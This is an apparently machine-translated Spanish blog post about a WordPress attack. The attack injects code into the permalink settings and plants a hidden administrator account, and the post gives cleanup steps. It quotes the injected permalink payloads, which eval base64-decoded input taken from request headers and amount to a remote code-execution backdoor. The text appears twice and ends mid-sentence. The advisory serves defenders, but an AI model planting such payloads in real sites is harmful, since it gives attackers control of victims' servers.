
Muchos sitios se han visto afectados por un ataque SQL reciente en el que se inyectan códigos en su sitio. Esta inyección de MySQL afecta sus enlaces permanentes haciéndolos ineficaces. Como resultado, las URL de las publicaciones de su blog no funcionarán. Numerosos blogs de WordPress han sido blanco de este ataque, gracias a Andy Soward por llamar nuestra atención.
Uno de los siguientes códigos se agregó a la estructura de enlace permanente debido a este ataque:
% & ({$ {eval (base64_decode ($ _ SERVER[HTTP_REFERER]))}} |. +) &%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Estas citas han agregado todos los enlaces permanentes a su sitio y solo se pueden editar si se eliminan manualmente.
Para solucionar este problema, vaya a:
Configuración> Enlace permanente y elimine el código anterior y reemplace el código predeterminado.
Lo siguiente que debe hacer es ir a Usuarios. Verá que hay más de un administrador. No verá su nombre en la lista, pero verá aumentar el recuento. Entonces, lo que debe hacer es mirar a todos los usuarios y encontrar al último que se registró. Pase el mouse sobre ese usuario y obtenga el enlace. Cambie el código userid = agregando 1 a ese número. Entonces, si el último usuario que puede ver fue el usuario no. 2, agregue 1 y conviértalo en 3. Debería encontrar que el administrador oculto tiene un código extraño como nombre. Borre el código y conviértalo en suscriptor. Luego regrese y elimínelo.
Esto debería solucionar el problema. También puede eliminarlo simplemente yendo a su PHPMyAdmin. Porque verá al usuario allí.
Solo queríamos dar a conocer esta noticia lo antes posible para que nuestros usuarios puedan estar actualizados. Asegúrate de comprobar que tu blog no esté infectado. Con suerte, WordPress saldrá con un lanzamiento pronto.
Además, si no ha implementado algunas de estas medidas para proteger su área de administración de WordPress.
Inyección SQL de WordPress: el último ataque
Muchos sitios se han visto afectados por un ataque SQL reciente en el que se inyectan códigos en su sitio. Esta inyección de MySQL afecta sus enlaces permanentes haciéndolos ineficaces. Como resultado, las URL de las publicaciones de su blog no funcionarán. Numerosos blogs de WordPress han sido blanco de este ataque, gracias a Andy Soward por llamar nuestra atención.
Uno de los siguientes códigos se agregó a la estructura de enlace permanente debido a este ataque:
% & ({$ {eval (base64_decode ($ _ SERVER[HTTP_REFERER]))}} |. +) &%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Estas citas han agregado todos los enlaces permanentes a su sitio y solo se pueden editar si se eliminan manualmente.
Para solucionar este problema, vaya a:
Configuración> Enlace permanente y elimine el código anterior y reemplace el código predeterminado.
Lo siguiente que debe hacer es ir a Usuarios. Verá que hay más de un administrador. No verá su nombre en la lista, pero verá aumentar el recuento. Entonces, lo que debe hacer es mirar a todos los usuarios y encontrar al último que se registró. Pase el mouse sobre ese usuario y obtenga el enlace. Cambie el código userid = agregando 1 a ese número. Entonces, si el último usuario que puede ver fue el usuario no. 2, agregue 1 y conviértalo en 3. Debería encontrar que el administrador oculto tiene un código extraño como nombre. Borre el código y conviértalo en suscriptor. Luego regrese y elimínelo.
Esto debería solucionar el problema. También puede eliminarlo simplemente yendo a su PHPMyAdmin. Porque verá al usuario allí.
Solo queríamos dar a conocer esta noticia lo antes posible para que nuestros usuarios puedan estar actualizados. Asegúrate de comprobar que tu blog no esté infectado. Con suerte, WordPress saldrá con un lanzamiento pronto.
Además, si no ha implementado algunas de estas medidas para proteger su área de administración de WordPress.
